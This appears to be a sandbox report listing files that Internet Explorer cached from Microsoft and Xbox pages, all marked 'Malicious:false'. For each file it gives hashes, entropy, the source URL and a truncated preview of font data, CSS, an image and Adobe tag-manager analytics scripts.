                                                                                                                                                                                                              Preview: wOFF.......D................................OS/2...X...G...`JM..VDMX.............^.qcmap.......v...<.#.Ucvt ... ... ...*....fpgm...@.......Y...gasp...0............glyf...<...........head.......6...6...Jhhea...L.......$.y.khmtx...l...U........loca...........<.W..maxp...D... ... ...Zname...d...@.....5q.post........... .Q.wprep............x...x.c`..c......:....Q.B3_dHc..`e.bdb... .`@..`.........`>.d..c...........x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x..w|....O..42..@B..."...A."..H/....#..[.A."..Dz.." .....cwv
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Picchu[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):77352
                                                                                                                                                                                                              Entropy (8bit):5.287116118466487
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:k5Dos5gKNfBLNEvT0P+rpZIkmo0nzRMWcXCECmQTnRi+:0knifdGxSkmBTmQ0+
                                                                                                                                                                                                              MD5:EA61364BBA3F975CBC7C780BCDFA0459
                                                                                                                                                                                                              SHA1:51F7721489B76379D964BBB6C60D48D75BCAC873
                                                                                                                                                                                                              SHA-256:3856D6CB77EFB03BBA3BD888D6C9B6852D4F0F9C6F245A8158C1D77554C80644
                                                                                                                                                                                                              SHA-512:877690ADE452CE9371605B4E6F93BA7C8555A74AFE55067D093D5D016FA07557A9097FC3E0451D340B1368CC97E9CE44B828EC1D092D7E70F81425AA0FC04A32
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-us/global-resources/Picchu-Grid/CSS/Picchu.css
                                                                                                                                                                                                              Preview: /*! picchu.css v0.1 | Microsoftdotcom team | Github - url coming once ready to make public */a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;vertical-align:baseline}/*! normalize.css v1.1.3 | MIT License | git.io/normalize */body,figure,form{margin:0}body,p{line-height:1.5}.mfp-title,pre{word-wrap:break-word}.mfp-arrow,.slick-slider{-webkit-tap-highlight-color:transparent}.clearfix:after,.slick-track:after{clear:both}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Prefooter_Icon_Support.svg[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 63 x 63, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):590
                                                                                                                                                                                                              Entropy (8bit):7.495068343701629
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7p6Nl6GVlwl0kGIRdL3AOzg5nDh0LoW5D89+GLHJhLtUOAKb4JN2+G:86XZl6GIRdLnzunt0r5D85LpYKb4JEX
                                                                                                                                                                                                              MD5:49A1F0189748EDE3AF29BB60606C22BD
                                                                                                                                                                                                              SHA1:D319994CDECAC4D85240DE6CC285C164FB5BB2D6
                                                                                                                                                                                                              SHA-256:3CF56E5D0FC1564FA5DF5F8FC7792207B8B6A00179EB71330B5E08479962C83D
                                                                                                                                                                                                              SHA-512:7A42843975F190664D0652C328E9523213D7B6A03EBF4048B318A24D69DA7C2396AA501B4D74C069029AE1AB972F8273D3C01CCEA609BB7BD6DBEA3C3BAF374F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon_Support.svg.png?version=c9732530-8f2c-4147-d343-fb2ccf2e43e4
                                                                                                                                                                                                              Preview: .PNG........IHDR...?...?......V.T....orNT..w.....sRGB.........IDATX..[..0....X...b........X..X....C...{6.sf.........=.7..... ...Xa..X...-Z;..ZAm....h....a...f.....t.t.y....G...=...U..=.IpF.....B...'Ju3^.9..<M..3e...0......u1.....`..y....k~........0...s.Mi..u.m2..A....Ub........W.......*.;.w.....^."..P....;.@...xW.|f{...?.d..v8.....k..O.%.".e$....w..sT.V.W..N.>..E...s.........5..Y.t.2.....x.L.gI.2FP..L.xZ+.......hd&.|..^.. ...8F......o="0..+[.W.)p+.-..v....B..x..........uT..^?..../.#..a}~&...u.0...ru.y.......5.....2.JP....w.. .Z.<.....^..*".....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC15f3408d92fc4519a3a4fbb6f85a3d5e-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1956
                                                                                                                                                                                                              Entropy (8bit):5.409186381138431
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:D5t/BuU24pykjA0EZmH5dSH9ejV3jXnJnrjW5ytgwjc5Q9WCv:VBBe4hjKyPjJjZrjWWgwjcO5
                                                                                                                                                                                                              MD5:FF69AEE0A5545FABD08DD48587C3C8C9
                                                                                                                                                                                                              SHA1:97AFE8196A831614149AF494B345201E21258D74
                                                                                                                                                                                                              SHA-256:93A3772A94B40C12CBEFCADE0379DC2AF1D3D1F681B793CF4483753DD09359BF
                                                                                                                                                                                                              SHA-512:A12A486B9C4A1282E38F25A10D2A3B40519C7DF0AC59C655E81D1F8B554F466E42FCCB17D810992959725CFAB1D2DB55AA5C837D4AE77533DA461CA077588780
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC15f3408d92fc4519a3a4fbb6f85a3d5e-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC15f3408d92fc4519a3a4fbb6f85a3d5e-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC15f3408d92fc4519a3a4fbb6f85a3d5e-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(t,i,n){var a=function(){i.genericSrc=\"8400690\",i.genericType=\"surf\",i.catPageLoad=\"lp_std\",i.catLearnMore=\"lrn_std\",i.catPurchaseNow=\"pchn_std\";var r=\"\",c=\"\";i.trackView(i.genericSrc,i.genericType,i.catPageLoad),n(document).on(\"click\",\"a[data-bi-bhvr='PARTNERREFERRAL'], button[data-bi-bhvr='PARTNERREFERRAL'], [data-retailer]\",function(t){0<n(t.target).closest(\"button\").length&&n(this).is(\"li\")||(n(this).attr(\"data-bi-id\")&&0<n(this).attr(\"data-bi-id\").length&&(r=n(this).attr(\"data-bi-id\"),c={u65:r}),i.trackEvent(i.genericSrc,i.genericType,i.catPurchaseNow,c,this))}),n(document).on(\"mousedown\",\"li[data-se
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC2df597d0072a4de68e7ad06f8d6467d1-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):682
                                                                                                                                                                                                              Entropy (8bit):5.321769520401854
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCGFcIdct/BefCGFcIILgU9EKTO/1JWn4KKNQ9vxA4KxgQAhVsw+vxIn:D4Idct/Bu4IvU97O/3+KNQk4jQcsw+v2
                                                                                                                                                                                                              MD5:7F40758A28D0F4BC6E9F7E4A0A51DE27
                                                                                                                                                                                                              SHA1:B97BCDD02D64505E564D6860B2AC521D0C3C7F2A
                                                                                                                                                                                                              SHA-256:FB04872C3837335DDE18583F191FE646247A3DB2377D0333B3798B5A76709D68
                                                                                                                                                                                                              SHA-512:18AC50B6951C5E5A27D8BFC8D052B4DD9827774335EC4829C4B9DD97995FCA76E90097741955DF8406658B6B266B35D347537F1E7A9BF6CEC1030AE3B24230F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2df597d0072a4de68e7ad06f8d6467d1-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2df597d0072a4de68e7ad06f8d6467d1-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2df597d0072a4de68e7ad06f8d6467d1-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.twitter&&function(a,t,i){var g=function(){if(window.location.pathname.match(/\\/en-us\\/surface\\/devices\\/surface-duo\\/?$/i))try{a.trackEvent(\"o4co9\",\"PageView\")}catch(t){}};i.category_all_status||i.category.socialmedia.status?g():i.category.socialmedia.queue.push(g)}(window.wdgtagging.twitter,window.jQuery,window.wdgtagging);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC2fdf0b42e0414a7982f3ba48531bc168-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6466
                                                                                                                                                                                                              Entropy (8bit):5.340686707558292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:3BTt++DwohjOmk07AiQYQRymDzR3Jf1nKZ6x1Pr8EWHcGdXGJHQMqhuG:3L+ydOW7iZVDzR3J9KZ6x1Pr8EWHcG9P
                                                                                                                                                                                                              MD5:E5D9BD61FEA7719D4F0A3D756B57C021
                                                                                                                                                                                                              SHA1:FC39075F5B287BC9260CFA5E8411CE38B0B391E1
                                                                                                                                                                                                              SHA-256:9C215144E59D9773A10F41DE5868C6FBE7109A867C673D9FE55D23A06328144E
                                                                                                                                                                                                              SHA-512:8E5EAD143A56E639E8F12CBA7C5DCD298ED13CC052F95060F0D612FA665D7AD508847037F18E93E5036CFF044A1DF49B417D5FF094B08648062B4577379A7906
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2fdf0b42e0414a7982f3ba48531bc168-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2fdf0b42e0414a7982f3ba48531bc168-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC2fdf0b42e0414a7982f3ba48531bc168-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,e,w,f){window.location.pathname;var m=window.location.href;w.wdgVideoTagging=!1,w.videoTaggingInit=function(){var u=awa.ct.captureContentPageAction;w.wdgAttachedEvent={},w.wdgVideoName={},awa.ct.captureContentPageAction=function(r){if(239<r.behavior&&r.behavior<253&&240!=r.behavior&&250!=r.behavior&&251!=r.behavior);else if(253==r.behavior)u(r);else if(240==r.behavior){var c=r.contentTags.vidid,g=r.contentTags.vidnm,v=!1,l=f(\".c-video-player > .f-core-player\").find(\"video\");l.length&&l.each(function(t){var e=this,a=f(e).closest(\".c-video-player\").attr(\"data-player-data\"),n=\"\";if((a=JSON.parse(a)).metadata&&a.metadata.vi
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC30b69654d14a4895ae64b6e5cf0cf812-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):8055
                                                                                                                                                                                                              Entropy (8bit):5.30636358160528
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:GB4utbhjqco07TGERdoXvL/XL5YxjikGeBf:GG6bhGco0fGEcD/XL5YxjiIBf
                                                                                                                                                                                                              MD5:B5328128E3776CC4A38AB5B668A7D32B
                                                                                                                                                                                                              SHA1:CC4B48959207CED7718F261DA4E3C0E35ED284E3
                                                                                                                                                                                                              SHA-256:B6DA510934D30AD418B297EEF40412AF896A78C0E5D59E789573717DA2F05B35
                                                                                                                                                                                                              SHA-512:5A625FBC37E3147D141F917562474BAEFC426AA589473C3E1FD34A0D114C07F1A89E8AE48F75130DF24AFC880067979AD237C8E1C77AEF68C3154DC61A9FE807
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC30b69654d14a4895ae64b6e5cf0cf812-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC30b69654d14a4895ae64b6e5cf0cf812-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC30b69654d14a4895ae64b6e5cf0cf812-source.min.js', "location.pathname.match(/\\/windows\\/get-windows-10\\/?/gi)&&0<$(\"#mwf-hmc\").length&&null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&(window.wdgtagging.data=window.wdgtagging.data||{},function(n,t,a,r,i){function e(t,e){i(t).attr({\"data-bi-scn\":\"hmc\",\"data-bi-fbid\":\"hmc\",\"data-bi-scnstp\":\"hmc-result\",\"data-bi-stpnum\":c.qseq.length+1,\"data-bi-field1\":\"fc:\"+e,\"data-bi-vtbm\":window.wdgtagging.data.sdata.vtbm+\";fc:\"+e,\"data-bi-sat\":\"fc:\"+e,\"data-bi-field2\":window.wdgtagging.data.sdata.vtbm+\";fc:\"+e})}jQuery(\"META[name='awa-pageType']\").length<1&&r.setMetaTag(\"awa-pageType\",\"HMC-page\"),(a=a||{}).sdata={};var c=a.sdata;c.qseq=[],c.qans={},c.current=0,a.ishm
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC568e247f3bc34228a576df85c9abafaa-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):676
                                                                                                                                                                                                              Entropy (8bit):5.325886328319481
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefr+6ct/Befr+XLgU+51wyABCexjDFbpiKoufoAVNUwu7kan/:Dr+6ct/Bur+sU+52yAHjNcugM6wu7Pn/
                                                                                                                                                                                                              MD5:2CA32B79CF53C2680DEB23A621259AD4
                                                                                                                                                                                                              SHA1:8C8A92E8E1C786B7EE951B52E20C2F10413054B5
                                                                                                                                                                                                              SHA-256:D7FDF433EE31CD5AC71ECB921E541368F4CF690818EF55BA5BC3CB37E7D32F7B
                                                                                                                                                                                                              SHA-512:7B1A7038B5413B8C6E08A150F90CAAEE198F4636BC5C4F468AAF0368A3C6F7B0D5062EFF26153CDECD259D8F7017325026E6E32CCB5E37204ADDC0C4617DEFCD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC568e247f3bc34228a576df85c9abafaa-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC568e247f3bc34228a576df85c9abafaa-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC568e247f3bc34228a576df85c9abafaa-source.min.js', "null!=window.wdgtagging&&function(g,o,t){var i=function(){/(www|xboxdesignlab)\\.xbox\\.com\\/(en-us|en-gb)\\/?/gi.test(location.href)&&t.insertScript(\"//www.microsoft.com/library/svy/xbox/broker.js\")};g.category_all_status||g.category.analytics.status?i():g.category.analytics.queue.push(i)}(window.wdgtagging,window.wdgtagging.comscore,window.wdgtagging.util,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC57b8e919ca054b8f8c35c98acef086ac-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2170
                                                                                                                                                                                                              Entropy (8bit):5.420274857437875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DqNYt/BuqNpcGe8UXw5Yl2T5wEWxW5plSw5MeWA:WNYBBPNeGepXwq2TujW/Mw5
                                                                                                                                                                                                              MD5:FFF74CD8E746CC79C206E70722B867DA
                                                                                                                                                                                                              SHA1:A42684929E56CC1CCE7097DFB944FD740C543EB2
                                                                                                                                                                                                              SHA-256:AB9BD9939C9943140D17D8BE2DBE4B0F65419C59401B118D4EF8590436433310
                                                                                                                                                                                                              SHA-512:15269BFC859AFF8B9B87041833999D83E76E788F088F6AA2F96AD7AD3B366D635F54CF5A45C9271E4CB19EF65AAC2B3A2C8BE1A7C39BFC2F1CA6A40C4403F8A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC57b8e919ca054b8f8c35c98acef086ac-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC57b8e919ca054b8f8c35c98acef086ac-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC57b8e919ca054b8f8c35c98acef086ac-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(n,o,t,a){var e=function(){var n=window.location.pathname;try{n.match(/\\/(en-us|en-gb|en-au)\\/promotions\\/marvel\\/?/gi)&&window.location.host.match(/www.xbox.com/i)&&(o.xbxpGenericSrc=\"8391491\",o.xbxpGenericType=\"xbxp\",o.xbxpCatPageLoad=\"lp_std\",o.xbxpCatPurchaseNow=\"pchn_std\",o.xbxpCatDownloadNow=\"dwln_std\",o.xbxpCatLearnMore=\"lrn_std\",o.trackView(o.xbxpGenericSrc,o.xbxpGenericType,o.xbxpCatPageLoad),a(document).on(\"mousedown\",\".m-content-placement a,.m-hero-item a:not('a[href*='xbox-game-pass']')\",function(n){try{o.trackEvent(o.xbxpGenericSrc,o.xbxpGenericType,o.xbxpCatLearnMore,null,this)}catch(n){t.debugLog(\"Er
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC66fad9a29d7e4a4abc78c265ab6c03bb-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7861
                                                                                                                                                                                                              Entropy (8bit):5.50295889167439
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:nBN5cGfTLl4kgiLHlTrwcA5o3o0Ucp3z45N330GZTm2/1zL4vYCJwGTRAhc:nn5RXl4kgiLHlTrwcA5o3oFcp3z45N3e
                                                                                                                                                                                                              MD5:069AA113C9CC4829CDD53DEC19773BB6
                                                                                                                                                                                                              SHA1:612910D0A4C302C2A62CFD2F1F0C6511CE1E8B0C
                                                                                                                                                                                                              SHA-256:1875020E72CC55391469A035A5B6E7BD1A4554AE36128F9A9557FF9011C2C5B9
                                                                                                                                                                                                              SHA-512:80C7E1F35667BF43C67BF5DFEEA39F801EBBC4048BA16A137FA291AF4AFFE129467FF3BB8EC5B6C1D3D6EBC3442F2A43F6A7197AFA992035186AB1D3197604AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC66fad9a29d7e4a4abc78c265ab6c03bb-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC66fad9a29d7e4a4abc78c265ab6c03bb-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC66fad9a29d7e4a4abc78c265ab6c03bb-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(e,a,s,o){var i,n,l,c,m,t=location.pathname,d={main_sel:\"MAIN\",zone_id:\"a3\",sec_custom_sel:\"#static-banner\",grp_custom_sel:\"[data-grid='container'],.wdg-m-prefooter,DIV[data-vg],SECTION[data-vg],#static-banner>DIV,#edge-latest,#edge-old,#non-edge,#device-header-Laptops,.iconimagesheading,[id]\",pnl_custom_sel:\"#Horizontal-acc,.m-product-placement-item,DIV[data-vg],SECTION[data-vg],#hero,#security-hero-banner,#device-subheader-Laptops,.iconimagesheading,[id]\",subpnl_custom_sel:\".svgimg,.m-content-placement,.m-product-placement-item,.divfilter_result_container,#test-laptops,[id],#test-twoin1,[data-vg],.m-product-placement-item
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RC83ccc95ed5f8479a8622ed377613280e-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7210
                                                                                                                                                                                                              Entropy (8bit):5.19693980637936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Dct/BudBnZXPQfnTIj8InpD9mExr2DAlmc3IGY4DfClmXO5YW9lm2FNYOCGjmxhW:ABBsvUsdpYZi4zOGS0hZSCIhPm7xrIu
                                                                                                                                                                                                              MD5:A82E6F54C4E20666494B4BB020AB38F1
                                                                                                                                                                                                              SHA1:BA5B87CF188BD27611555A4F11CA78E20F2562D4
                                                                                                                                                                                                              SHA-256:3D547D5FF1981620701C4CDC2A1C8CD93C1C216A3C309179F0634FF8F4F3B0E1
                                                                                                                                                                                                              SHA-512:E48D4564815CFE4B584B7422309695C068569BA723FCC8066D91E6045257B8326CACB710CEC17CBA47F25B26FC3EF0BA3176E83317A6BBCB727FC9297E5A3509
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC83ccc95ed5f8479a8622ed377613280e-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC83ccc95ed5f8479a8622ed377613280e-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC83ccc95ed5f8479a8622ed377613280e-source.min.js', "null!==window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(i,t,s,d){if(window.location.pathname.match(/\\/promotions\\/visit-xbox\\/postcard\\/?/i)){var a,e;(t=t||{}).sdata={};var l=t.sdata;s.scn=\"Xbox-Postcard-Campaign\";var o={q1:\"\",q2:\"\",q3:\"\",q4:\"\",q5:\"\",q6:\"\"};i.isxboxpostcardend=i.isxboxpostcardstart=!1,s.initializeQuestions=function(){localStorage.getItem(\"updateqalist\")?(l.questions=JSON.parse(localStorage.getItem(\"updateqalist\")),o=l.questions):(o={q1:\"\",q2:\"\",q3:\"\",q4:\"\",q5:\"\",q6:\"\"},l.questions=o)},s.initializeQuestions(),s.xbox_pc_start=function(){try{if(localStorage.clear(\"stepnumber\"),localStorage.clear(\"updateqalist\"),s.in
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RCb36993ed0cd440348a1b4711c13dbc8e-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2940
                                                                                                                                                                                                              Entropy (8bit):5.3695695067472595
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DBmt/BuBTmTcmF8j4cELlnwnBoSi3JcNcmF6RFufWlW/04AvDR/YGH:cBBhlaQJc98RqWlW//EZ
                                                                                                                                                                                                              MD5:1C36D249629E44016C944F8E82610388
                                                                                                                                                                                                              SHA1:39245654302D8A9F4ED72ABF318999BABDAEBC45
                                                                                                                                                                                                              SHA-256:9A869778964A7B4E42C37093A960AABBA40459DF3F62B297B44809523DA62767
                                                                                                                                                                                                              SHA-512:F7148FF38C74910F13DDFA2F8D9E51640F658CF6564F703043FEC677BB84C07EBF35A7935FD84029E5AED4B2ED210F363F811766823DE9846256CEAEB2355A14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb36993ed0cd440348a1b4711c13dbc8e-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb36993ed0cd440348a1b4711c13dbc8e-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb36993ed0cd440348a1b4711c13dbc8e-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.facebook&&function(n,c,d,l){var e=function(){function e(t){var e=c.getProductInfo(t),n={content_name:r.content_name||\"\",content_id:e.id||t.attr(\"data-bi-prodid\")||t.attr(\"data-bi-product\")||\"\",content_type:\"product\",lang_locale:r.lang_locale||\"\",partner:e.retailer||t.attr(\"data-bi-prtnm\"),cta:e.cta||jQuery.trim(t.text())||t.attr(\"data-bi-name\")||\"\"};d.trackEvent(\"trackSingle\",d.globalpixelId,\"AddToCart\",n)}jQuery(\"meta[name='MscomContentLocale']\").attr(\"content\");d.globalpixelId=\"1770559986549030\",d.init(d.globalpixelId);var r={content_name:n.getData(\"gpn\")||\"\",market_name:n.getData(\"loc\")||\"\",lang_locale:n.getDa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RCb6b820eb13fb47b2a5b09e6dd171df6a-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5129
                                                                                                                                                                                                              Entropy (8bit):5.39075042059073
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:bBBdoL42R90qEXKv/BVVbqEbjEP5dfoUEW1NiyLMk1NGddv8QQMmf:bBjoc29EXKv/BVVeEbjEP5dfoUEW1NiC
                                                                                                                                                                                                              MD5:05DD909FFC3B740538C7B9391A1F86E5
                                                                                                                                                                                                              SHA1:56EF71510394282B3759DFE9CB5467F99FBD4100
                                                                                                                                                                                                              SHA-256:27E441839BC4B57F9B9FE5E945FB0F83BD2EF968F6578D114AE4FACDF979AC30
                                                                                                                                                                                                              SHA-512:31EB3ECF3A68F5577CBDB5DC3CE058D5537A732D15C925886B15DB438849FC380E750C3E53702B7D50C04D5C1A1A0D92B4CD4ABAF3ADD25EA4E2F70598C32397
                                                                                                                                                                                                              Malicious:false
